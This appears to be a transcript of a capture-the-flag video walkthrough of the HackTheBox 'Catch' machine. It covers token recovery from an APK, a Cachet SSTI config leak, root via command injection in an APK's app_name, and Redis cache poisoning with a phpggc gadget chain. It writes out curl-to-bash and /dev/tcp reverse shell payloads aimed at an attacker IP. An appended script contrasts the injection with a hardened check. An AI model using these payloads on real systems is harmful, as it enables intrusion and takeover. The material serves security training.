HackTheBox - Catch

IppSec · Beginner · 🔧 Backend Engineering · 3y ago

Key Takeaways

The video walks through the HackTheBox Catch machine: an nmap scan, decompiling an Android APK with jadx to recover hard-coded API tokens, using the Gitea and Let's Chat APIs with those tokens to dump chat rooms and messages and recover a password, logging into a Cachet (Laravel/PHP) instance and leaking its configuration through a known SSTI in the mail settings, and escalating to root through a command injection in an MDM script that reads app_name out of a repackaged APK's strings.xml. It also covers the intended path: pointing Cachet's cache driver at an attacker-controlled Redis instance and poisoning the cache key with a phpggc Laravel gadget chain for PHP deserialization RCE, and notes a pre-authentication SQL injection in the same Cachet version.

Full Transcript

What's going on, YouTube? This is IppSec. I'm doing Catch from HackTheBox, which is all about catching an API key out of an Android APK file. You do that by just decompiling it and looking at the strings; you can find a few API keys to various services. You google those services' API interfaces, read the documentation, see how to utilize the token, and one of them is a chat room: you can use the API key to view all the rooms, view the messages, things like that, and you intercept a password out of one of the chat rooms to access a different service named Cachet that has a bunch of vulnerabilities. Now, this Cachet service also has a pre-authentication SQL injection, so you could have skipped everything as long as you found this one service. Once you get on the box you can find there's a privesc in how it handles analyzing APK files, so if you change the name there's a command execution, or command injection, in there. But with that being said, let's just jump in.

As always, we're going to start with the nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it catch, and then the IP address of 10.10.11.150. This can take some time to run, so I've already run it. Looking at the results, we have five ports open. I can tell that because it says 995 closed ports and the default nmap scan does the top 1000. So the first port is SSH on port 22, and its banner tells us it's an Ubuntu server; nothing really interesting there. HTTP on port 80 runs Apache on Ubuntu and it's not really giving us anything; the http-title is Catch Global Systems, but nothing too interesting. Then we have port 3000 open, and based upon the scripts I'm going to guess this is a web server, because we see HTTP here and the cookie i_like_gitea. So it looks like there is an application called Gitea on this; I just know it based upon the cookie. The application's name is Gitea; it's like an open source version of GitHub type thing or something, I don't know exactly what it
is; I've only seen it on HackTheBox, but I know a lot of places do use it if you look at, like, Shodan and things like that. We also have port 5000 open, and this looks like it is also going to be HTTP. Looking at this, we see this cookie has a connect.sid, and I want to say that's popular in Node.js applications; I think maybe Express uses this by default, so this one's probably Node. Gitea, I don't know what language that is. Let's go to Firefox real quick: gitea github, and I just noticed my FoxyProxy's not here, uh-oh. That's in Go, so the first web server is Golang, the second one is probably going to be Express, and port 8000 looks like it is HTTP, Apache, and we're not getting any headers here. Interestingly enough, when nmap discovers it is Apache it doesn't seem to be printing every header, or maybe it's just not giving us the cookies. So what I'm going to do is go to 10.10.11.150 port 8000, and we see Catch Global Systems, powered by Cachet. If we look at this, it's an open source thing; if we go to GitHub, this looks like Laravel, so PHP. Let's take a look at the cookie just to see if anything comes out, and I don't know why Firefox decided to not tell me I have FoxyProxy anymore. So 10.10.11.150 port 8080, okay, and now let's hope this works. Intercept on, refusing, what? 127.0.0.1 8080 proxy, let's see, SOCKS5, you can take that off I guess. Oh, 127.0.0.1, that's what I wanted. There we go. So now refresh and look at intercept. Yeah, we have a laravel_session. So nmap doesn't show the cookie by default if it detects it as HTTP, I guess. So we know this is definitely Laravel. If we go to port 80 we can see exactly what this is, potentially. So let's intercept on, refresh, let's see, I'm going to get rid of my cookies real quick, because I think those cookies, like that laravel_session, are coming along because I accessed it on a different port. So let's delete this, delete all. Why is the cookie still here? Storage, delete all, delete. I am not sure
why I can't delete this. Let's just clear, clear data, yes, clear history. Something is going on with my Firefox; I think I still see the cookie. Let's restart Firefox, see proxy is still set, 10.10.11.150, okay, I don't have any cookies now. So if I intercept this, go over to Repeater, we send it, and the server is not sending us any cookies back, so this isn't leaking what it is yet. So the next thing I'm going to do is try like /index.html to see if this is HTML; index.php, we get something back, so we know this web page is probably going to be PHP. And if we look at it we have a few links: Teams, that is not a link. I'm going to press F12 and look at this: Teams, li, so it's just a list, it doesn't look like it is an actual link. We got Sign Up, Login, those don't go anywhere; Download Now, and Download Now looks like it is downloading an APK, so that is an Android package. So we can save the file, and then the very first thing I always do with APKs is try opening them up in, like, jadx, or decompiling them. So I'm going to move Downloads/catch.apk, and then we can do jadx-gui (and you can just apt install this) and we're going to open up this APK and see what we have. Let's see, open, maybe you don't specify the file name with the argument; if you do open you can. We can see the catch.apk, and if we go to, probably, com (these are like default Android libraries) but com.example.catch, and we can see the source code here, so it looks like it has decompiled it successfully. Do we have like a dark mode? De-obfuscation, navigation, File, Preferences, oh there's a lot of things, probably not going to worry about it. Light, dark, Dracula, I'm not sure why that doesn't go dark, but oh well, it looks better. So we look at MainActivity and let's see, we have a web client, and it looks like this is the main function, onCreate: it's just going to open status.catch.htb. So let's go and open this. We have to edit a hosts file, because by default we won't resolve to this. So 10.10.11.150, put this in, delete
the https, and then we can go to status.catch.htb and we have a webpage. So this looks like the same thing as before, so nothing too interesting here. We can do, let's see, if we do File there's got to be a search here, right? Quark engine... if we do a text search we can search everything, and we can search for things like password, right? So if I do password we can see where password exists. Token is another good one to use, I think. Because I hit enter by, like, my habit, I hit enter and it went to the first thing. So let's look for token, and we scroll, and we do see things in this strings.xml, and we have a gitea_token and a lets_chat_token and a slack_token. So we can potentially use these to log into applications, and generally when you have a token this is going to be an API. So we want to look for the Gitea API. I'm just going to disable my proxy because I don't have a certificate for my Burp Suite in, and we can just google gitea api doc and see how to access it. Usage, and let's see, curl, username, password, we don't want that; this is getting tokens; Authorization: token header. So we want to do something like this, right? So curl, Authorization: token this, and we just want to find a reference that is easy to hit. So I wonder if I just do a curl against /api/v1. So if we do curl 10.10.11.150, this was port, I want to say 3000 is Gitea, let's see, yep it is, I can see right here, so /api/v1, 404 not found. So what I'm looking for is some low-level, like low-privilege, endpoint, right? Because if I did the example with this Authorization token, if this repo doesn't exist then it's going to just fail, right? So if I do /repos, not found. So we need to get some API, particularly one that won't 404. Let's see, gitea api get current user, let's see, API usage, is this the same document I'm at? Enable Swagger, see /api/v1/users, because this is saying your username, I can't just use this one, right? Their API documentation sucks. Let's see, api swagger, here we go. So see GET /
user, /api/v1/user. Token is required. This is what we wanted, right? So now I can do -H for header, and we want to go back to how they used it: we do Authorization: token and then our token, right? So Authorization: token, and we need to go to this and we can copy it, and it's saying token is required. So I'm guessing this token is invalid. However, we have other things, so Let's Chat. Let's go to port 5000, 8000, so 10.10.11.150:5000; 5000 is Let's Chat and 8000 is, oh we saw this before, oh this was Cachet, right? So we have a token for Let's Chat, so I'm going to google lets chat api documentation. One of the things I noticed of this token is it's base64; just the two equals at the end, the padding of base64, makes that really stand out. So the first thing I want to do: echo -n, put the base64 in, decode it, and it looks like a hex blob. Calling it a hex blob, and like, I don't think 16 is a valid hex, so I don't think this is just hex encoded, or at least ASCII. So let's see, lets chat api documentation, Let's Chat API, Let's Chat wiki, Authentication. So it uses bearer tokens, so that's Authorization: Bearer, and we can do a GET on /rooms. So let's try this. I'm going to copy this token and we can curl 10.10.11.150/rooms, and this was port 5000, I want to say, and -H (I'm going to put the header before the thing because we don't want to change this too often) Authorization, I think Bearer, like this is how we do a bearer token. It is awesome. If we put invalid, something invalid there, let's just get rid of a few characters, we can see it just says unauthorized, right? So we have successfully done that. We can do a jq . so we print this out. I'm going to add a -s, which is going to be silent so it doesn't print that, like, curl downloading thing, and I'm going to do open close brackets, .[], to get past this, and then I want to look at name, right? And let's see, we got Status, Android Development, and Employees. So we
can probably go into the Employees chat, right? So let's see, this is getting rooms, so /rooms/:room. So I wonder if we just do /rooms... if we look at Employees, copy, paste, jq no longer has a name, and we can see, let's see, the id, this is the room, we have slug employees, private false, so it's not a private room. But this isn't getting messages, so we want to see how to get a message. We could delete a room... if I go back I'm going to search message, messages, so /rooms/:room (which is going to be the id) /messages. So if I put /messages here we should get the messages of this room. So I'm just going to do the jq thing again to do text, and we can see the messages of this. The IT admin is lucas, but nothing too interesting there. So let's look at the rooms again, and I want to get Status, so let's go to this room, this is the id, and if we put it here and go /messages we can see the message, and we got credentials: john and then this string. So I'm going to try ssh john@10.10.11.150 and paste this in, and we can't log in. I'm reading the rest of this; we can try this at the Cachet page, I guess. So if we go here, go to Dashboard, we can log in, john, paste the password, and it's taking its sweet time, maybe, to log in. I'll come back to that because I want to look at the last room's messages, this Android dev. So let's copy this room id and look at the other room, paste this in: working on an Android app, so nothing interesting here. But now we are in the Cachet. If I click on Settings, let's see, what is this, is this button log out, probably, 2.4.0-dev. So I'm going to google cachet 2.4.0, and we have a blog posting of exploitation. So there is a pre-authentication CVE, SQL injection, which we probably could have exploited if we just enumerated this earlier; there is RCE, and there is something else here, right? Let's see, I'm going to go through a lot of these, but how I originally did the box, I saw this configuration leak. If we go to google on this, let's see, the PoC, we can
look at it and download it. And let's google, or not google, but I'm going to call this just exploit.py, set mode to paste so I can just paste this in. If we exploit it we have -n username, -p password, -u URL, and the script allows us to set a proxy, which is super handy. So username is john, password is, let's see, this string, -u 10.10.11.150, this is port 8000, and I'm going to set the proxy, but I'm not going to intercept; I'm just going to pass it in and we can look at it through the HTTP history. So we run this. The password has some bad characters, so we have to put that in quotes, so single quote, single quote. -n is required; out of habit I did -u for username, and it's -n. Let's see, no adapters were found; we probably have to give this http://, and my proxy is actually intercepting, so let's turn that off and we can see what it does. So we have it logging in. Oh well, it does a GET first, probably to test it, and man, it did a lot of POST requests there. We're doing token, we log in, we're going into dashboard, settings, mail, and I think the reason it's doing all this is because of the cross-site scripting things, right? Token, and we're sending a POST; doesn't look like we're really setting anything here. So this is another GET, then we're going to do a POST, SMTP, and right here we can see the actual exploit. If we read the post we know it's just like server-side template injection, but they're just putting the dollar bracket and then the variables from a config, and it's going out and just putting the variable there. So the next thing it does is a GET request, and if we look at the response we should see it, but it's going to set it back, right? So one of the POSTs sets everything back. Instead of viewing it in this way I'm just going to copy something. So if we look at DB_USERNAME, I guess we'll try to make it say... but we have everything here. Since we have this APP_KEY we can exploit a Laravel deserialization most likely, but we have MySQL creds, and this I believe
is SSH as well. But I want to show this exploit, exactly what it's doing. It's SSTI, and it's the best type of SSTI, because we don't have to build a complex payload; we just can leak variables, right? So notify@this, I'm going to put ${DB_USERNAME}; let's just do 127.0.0.1 for this, user, password, and it was notify. I'm going to see if it's will once I save this. So save, let's click on Mail again, and it is will, because we put the DB_USERNAME. We can put DB_PASSWORD as well and see what happens here. And I don't know if we have to fill out all these; I just do it because, I guess, habit. If I go back to Mail it still says will; I'm guessing there's a bad character in this password that prevented it, right? But yeah, so that is the SSTI there.

So let's go and SSH into this box. So I'm going to ssh will@10.10.11.150, put the password in, and we're in. The first thing I always like checking is just the sudo rules, so sudo -l, paste in the password, and will cannot run sudo. So the next thing we can do is look at the users on the box, and I'm just going to grep everything that ends in sh, because this generally gets used with the shell. We can see /home/git has a shell, as does will. I'm guessing git is going to be part of that Gitea application that we saw earlier, but I don't really see too much there. So I'm just going to do a ps -ef --forest and it's going to list all these processes. We could take a look at the MySQL database, because we did have the password for this. If I just do mysql -h, I want to say 127.0.0.1, -u will -p, put in his password, we can log into the database. We only have cachet, so we could go into this database and look at it. We don't have the ability to go into the other applications and extract other credentials, right? So I'm just looking at show tables; we can select * from users, and we can kind of get a look there. I like now replacing that semicolon with \G because it prints it out a bit nicer. But we already had, oh no, we had john
that's where that john is; john is not here. I'm not exactly sure how this application works, but we could try cracking admin; but nothing really too interesting. If we go into the /opt directory we see an mdm, which normally stands for mobile device management, and it kind of makes sense because there was an Android application. If I go here there's a verify.sh. If we cat this we can see it's an MDM checker. I'm going to vim it and look at it, so vim verify.sh, and we can see it's doing some type of signature check here, argument one and argument two, that's what that means; we don't know exactly what this is. Compatibility check, looking at the SDK version, it wants it to be, less than eight, it wants it to be above 18, because we see if the SDK version is less than 18 then say APK doesn't meet these requirements and exit. And here we're pulling the app name out of res/values/strings.xml, and if the app name has Catch in it then it's going to echo the app name and then do an xargs and make a directory. And right here it looks like we have command injection, because we're just passing a variable that we can potentially control. If we can control this app name in this file, and if we put like a semicolon here, we could potentially trigger command execution, or backticks, or dollar parentheses, there's a lot of things we have. So we just have to name it Catch and then something else, right? And then clean up, and it's looking at the dropbox. So this is the actual loop: it's going into the dropbox, which is /opt/mdm/apk_bin, and then extracting it. So we just have to pass sig check and compatibility check, and then in the app check is where we have the command execution. So we just want to make sure AndroidManifest is above version 18, and I don't know what the jarsigner is, but we'll see if that comes into play. I bet if we just use apktool and build something it may pass that; not positive. So if we go into apk_bin we don't have anything, so we can do a ps -ef and see if this thing
is running. I'm guessing it's on some type of cron, so we have to run pspy or something. If we do --forest again we can see there is this root check.sh; its parent process id is 10042, so we can try looking at this. So if I go cd /proc/10042, cat cmdline, we can see it's doing a loop and just executing check.sh constantly, so nothing too interesting there. That process is running quite a few times; we see root check.sh more than once. We got docker running; I'm guessing some of the web apps just run in Docker. We can confirm Let's Chat was indeed a Node.js thing; we see it starting with npm. And yeah, so let's go back to our box and create an APK. So we already have this catch version 1.0 APK, so that's what I'm going to use. I have apktool; I think I installed this in the RouterSpace video, so if you don't have it and you have trouble installing it, go to that video, but I think it was just an apt install. I'm going to do a d, I think d stands for decompile, s for source, and I'm going to give it the APK, and then -o is going to be an output; I'm going to give it app and it's going to decompile into this app directory, right? And then if we look at AndroidManifest we want to look at the version, right? So I'm going to go back into /opt/mdm, v verify, and compatibility check is looking for, let's see, compileSdkVersion, compile SDK, and it's at version 32.
So we're above 18; that should be fine. The other thing we need to do is the name, so let's go down and let's see, it is string name, so string name... oh, we're in a different file now, res/values/strings.xml. So res/values/strings.xml, string name equals, let's see, app_name, here we go. So it's Catch, and I'm going to do ; curl 10.10.14.8/pwn (let's do this on port 8000) and then do another semicolon, and I'm going to pipe it over to bash. So what this is doing is it's going to replace this app name, let's see, right here, so it's going to make this echo and then we'll do curl, our IP, and then pipe it over to bash, and then another semicolon. So the xargs just fails, but it already executes this, so it doesn't matter. For good measure we could do like a comment or something so that command doesn't fail, but I don't think it matters, and I'd rather not put another special character in this if I don't have to. The only thing I don't know right now is if app_name can have a space, and that's what we're about to find out, probably. So we go back up, we can do an apktool b for build, app, and -o, I'm going to call this catch-ipsec.apk, and oh, it failed. I think, see, did this could not exec... sdk one... I don't know where it's actually erroring at. Invalid file name, must only contain a to z, zero to nine, huh. So I don't think it likes this; I don't know if that's crashing it though. So I'm going to remove all the special characters real quick. So if I do vi app/res, I think it's values, then strings, and go where the curl is, and we just... actually I'm going to back this file up first, and now I can go where the curl is and we can delete this, and let's see if apktool builds us now. And it doesn't; I should see an ipsec one. So I'm going to google this error, and I'm starting with this one not only because it's first, but like, it's saying it can't extract a resource, which sounds worse than invalid file name. So let's just google this GitHub issue, let's see, a few things, -f, -r, I don't know what those
flags are, but let's try it. So -f -r, still nothing. See, apktool, so they removed it and then installed it from here; this is 2.6.1, apktool -v, probably for version, let's see, 2.5.0. So let's download the latest, I guess, save this, downloaded, mv Downloads/apktool, and then we can execute with java -jar apktool, and we can copy this. Actually I'm going to go to the one without the flags, I don't know, copy, paste, and that looks better, and it built catch-ipsec. Okay, so now let's go back to, move, history, let's see, here is strings.xml, and this goes in app/res/values. That one just has our, let's see, the curl command, right? Yep, that's back there. So we can set up a web server: mkdir www, let's move, or build, and then we will move catch-ipsec into www, and python3 -m http.server. And we go back up here, apk_bin, wget 10.10.14.8:8000/catch-ipsec.apk, okay. And I'm guessing if this verify script hits we'll get a callback on our web server. If I can be quick enough we can probably... we're not quick enough, but there we go, we see it hit pwn and try to execute it. So let's just put a shell here, so /bin/bash -i >& /dev/tcp/10.10.14.8/9001 0>&1, like that, okay. And we can run this again, and now when it hits pwn it should send us a shell. Give it a second, and there we go, we have root@catch. So that was probably the easiest way to do this box. It wasn't the intended way; the intended way did not give us SSH credentials right away, instead it used a different exploit path that we're going to walk through.

So let's step back. The intended way starts at having access into this Cachet system, and instead of extracting the config via this interface we do a different exploit and point a Redis instance to us and then use PHP deserialization to attack this. So let's get started with that. The first step is to get back to the Cachet exploit page that we had found earlier, so let's search this, and if we go, let's see, I'm just going to do a search, it's talking
about an exploit right here where we can overwrite an environment file. So it's very much like this SSTI, but it's more along the lines of a mass assignment vulnerability, where we're going to use this form to write to not the mail but the, I want to say, session driver or cache driver. So the first step is we have to install Redis, but I already have it installed, so I'm just gonna do redis-server and do --protected-mode no, and then if we do redis-cli we can access it. If you don't have it installed you can just install it with apt install redis-server. We can do keys * and it's empty right now because nothing's pointed to it. So that's where the exploit comes in. So let's go back to this Settings page; we're going to intercept the request and we're going to use that mass-assignment-like vulnerability to replace the MAIL_DRIVER with CACHE_DRIVER, and what that's going to do is, now when Laravel sees this, instead of editing the ini for the mail driver, it's going to edit the entries for the cache driver. So we put its string in, and this Redis server is going to be 10.10.14.8, database can be 0, session, like that. That looks good, and I'm going to send this over to Repeater so I can just copy and paste this quickly. So I pressed Ctrl+R, but we can't just use Repeater constantly because of, what did some call it, the cross-site request forgery. So now we can see it gave us a key. So what we want to do is poison this key with a PHP object. So I'm going to go to /opt/phpggc, which is PHP gadget chain collector; it's just on GitHub, if you just google phpggc you will find it, and we can list with -l. We want to grab Laravel, and I'm going to pick RCE9 because it's good from 5.4 all the way up to 9.1.8.
I wouldn't do one like RCE5, because this is very specific; you'd have to enumerate the Laravel version. I like going as broad as possible. So the other thing we're going to do is a -a, just because I know for this one it's more reliable. So if it doesn't work without the -a, then add -a; I don't know a good way to know it other than experimenting, right? So we do -a Laravel/RCE9 and we can test it with system id, and we get this gadget chain. So I'm going to set this key equal to this value, so now when the server goes to pull this key it should get the poisoned entry and we should see the id. Nothing's happening here, because I'm guessing the server reverted itself. So let's just go back into Mail and intercept this, then go into the Repeater tab, copy this and paste it in the correct spot, forward, and going here we get an error page, but up top we do see the id command ran. So now the next thing to do is the same exact thing, but instead of doing id let's do /bin/bash -c "bash -i >& /dev/tcp/10.10.14.8/9001 0>&1".
And oddly enough it doesn't look like it's escaping the double quotes, and it uses double quotes elsewhere. I don't know if that's going to cause an issue; if this doesn't work I'm going to guess that's an issue. But with PHP deserialization, or with objects in general, it lists the length, so this s means string, 55, this is a string of the length 55, so maybe the quotes won't mess it up. We can do keys *, we can set this key equal to the reverse shell value, so copy, paste. Oh, let's see, set... I'm guessing maybe that was an error because of the bad characters, hopefully not. Value, let's see, maybe I copied the top piece too, doesn't look like it. Oh shoot, I think I put double quotes, no I didn't, up there. This little command line thing is so slow. I don't know what I screwed up, because that looks identical. I'm going to guess it is the single quotes here. I'm going to put this in double quotes and this one in single quotes; does this change at all? Yes, it does. So what was happening is I used single quotes here, which put a single quote in my payload, and since I was doing single quotes into the Redis, that's what screwed it up. So now I did a double quote here, so that may resolve the issue. Quotes are always a pain. So set this equal to, not that, but this, same quote, paste, there we go. We want to definitely start a reverse shell, or start a listener. I'm guessing it's not going to work right away because we have to re-poison it; I think there's just probably a cron that's reverting this file or something so people don't break the server. So copy, paste, that's not copy, copy, paste, forward, and we get a reverse shell as www-data. And then the next intended step here would be to go find that .env file, and if you cat the .env file you would get the database password, which was will. So we could also go into, probably, /proc/self... I wonder if we have it just as an environment variable, DB_USERNAME, yeah we do, because we're a shell of the web server, we get the web server's environment
and if we look, DB_USERNAME is will right there, and the DB_PASSWORD is right here. I was just going to go to /proc/self and cat environ, right? That's a different way to do it. But yeah, that is doing this box the intended way, through the PHP deserialization. And I'm not going to show the SQL injection, but if you just go to the post and search for that, sql, whoops I passed it, let's go up. If we copy this and paste it, we have to fix a proxy, but there are exploit scripts for it; it'll just get you the administrator hash, which I think you may be able to crash, or, you can, crack, or you can change the exploit in order to leak a file probably instead. I'm not exactly sure how this one works, but the script is pretty self-explanatory, so you just run this, give it the hostname, and yeah. So hope you guys enjoy the video, take care, and I will see you all next week.
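The verify.sh command injection described in the transcript (app_name pulled out of res/values/strings.xml and fed through xargs to mkdir, so a ';' in the name runs whatever follows) is reconstructed here as an added shell example. This is not the box's script and not IppSec's code: the exact xargs -I / sh -c form is an assumption, since a ';' can only start a second command when the name is re-parsed by a shell, and the strings.xml content, directory names and the "touch" marker are constructed for the demo. The hardened function beside it shows the check a practitioner would want: allowlist the characters, then pass the name as one argument with no shell in between.

```shell
#!/bin/sh
# Added example (not from the Catch box or the video): reconstructs the app_check
# flow described for /opt/mdm/verify.sh and contrasts it with a safe version.
# Assumption: the real script hands the name to "sh -c" via xargs -I; that is what
# lets a ';' in app_name terminate mkdir and start an attacker command.

WORK=$(mktemp -d)

# Write a constructed res/values/strings.xml carrying the given app_name, the way a
# repackaged APK would. $1 = output file, $2 = app_name value.
make_strings_xml() {
    printf '<?xml version="1.0" encoding="utf-8"?>\n<resources>\n    <string name="app_name">%s</string>\n    <string name="gitea_token">placeholder</string>\n</resources>\n' "$2" > "$1"
}

# Extract app_name the way the checker does: a regex over the <string name="app_name">
# tag, so whatever sits between the tags comes back verbatim, metacharacters included.
app_name_from_strings() {
    sed -n 's/.*<string name="app_name">\([^<]*\)<\/string>.*/\1/p' "$1" | head -n 1
}

# Vulnerable form: the name is interpolated into a command line that a shell parses,
# so "Catch; touch X;" runs mkdir, then touch. $1 = base dir, $2 = app_name.
vulnerable_app_check() {
    case "$2" in
        *Catch*) printf '%s\n' "$2" | xargs -I {} sh -c "mkdir -p $1/{}" ;;
        *) echo "[-] app_name does not contain Catch" >&2; return 1 ;;
    esac
}

# Hardened form: same "contains Catch" rule, then an allowlist on the characters, then
# mkdir gets the name as a single argument with no shell in between.
# $1 = base dir, $2 = app_name.
safe_app_check() {
    case "$2" in
        *Catch*) ;;
        *) echo "[-] app_name does not contain Catch" >&2; return 1 ;;
    esac
    case "$2" in
        *[!A-Za-z0-9._-]*) echo "[-] rejected app_name with unsafe characters: $2" >&2; return 1 ;;
    esac
    mkdir -p -- "$1/$2"
}

# Demo on a constructed injected name of the same shape used in the video:
# "Catch", a ';', an attacker command, another ';'.
INJECTED="Catch; touch $WORK/pwned;"
make_strings_xml "$WORK/strings.xml" "$INJECTED"
NAME=$(app_name_from_strings "$WORK/strings.xml")

mkdir -p "$WORK/vuln" "$WORK/safe"
vulnerable_app_check "$WORK/vuln" "$NAME"      # creates vuln/Catch AND $WORK/pwned
safe_app_check "$WORK/safe" "$NAME" || true    # refuses the name, creates nothing
[ -e "$WORK/pwned" ] && echo "[!] injection ran: $WORK/pwned exists"
echo "[*] contents of safe dir:"; ls -A "$WORK/safe"
```

The allowlist is the part that matters: quoting alone ("mkdir -p '$1/{}'") only moves the problem to a name containing a single quote, whereas rejecting anything outside [A-Za-z0-9._-] and never re-parsing the string through sh closes the whole class. In a real MDM pipeline the name from a dropped-in APK is attacker input and should be treated that way before any of the later checks run.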

Original Description

00:00 - Intro
01:00 - Start of nmap, going over some standard cookies and knowing the web technology behind it
06:15 - Checking what the main webpage is, discovering an APK file
07:00 - Analysing the APK file with JADX-GUI
09:00 - Searching for strings, finding some tokens
10:15 - Looking at the Gitea API to discover how to use our token
14:15 - Looking at the Let's Chat API to discover how to use our token and dumping a list of rooms
16:30 - Using the Let's Chat API to dump messages from a room and discovering credentials
17:40 - Logging into the Cachet webserver, finding the version and discovering known vulnerabilities
19:20 - Using a CVE-2021-39174 PoC to dump the Cachet configuration and get a password (SSTI)
23:50 - Logging into the box as will
25:40 - Discovering a verify.sh script that has a command injection when verifying APK files
29:00 - Using apktool to decompile the APK so we can change the name and repackage it
33:15 - Having trouble repacking our APK file, need to update apktool. Then getting root
38:00 - Showing another way to pop the Cachet server, by updating the cache configuration to point to our Redis instance and phpggc to create a deserialization gadget

This video teaches how to hack the HackTheBox Catch box by analyzing web servers, discovering API endpoints, and exploiting vulnerabilities in an Android application and a Laravel-based web application. It demonstrates various tools and techniques, including nmap, APK decompilation, and Redis with PHP deserialization for RCE.

Key Takeaways
  1. Use nmap to enumerate open ports and identify the web servers behind them
  2. Decompile APK files using Jadx to find embedded tokens
  3. Discover and query API endpoints using curl and jq
  4. Use Redis with PHP deserialization for RCE
  5. Execute system commands via the deserialization gadget stored in Redis
💡 The video highlights the importance of analyzing web servers and discovering API endpoints to exploit vulnerabilities in Android applications and Laravel frameworks.
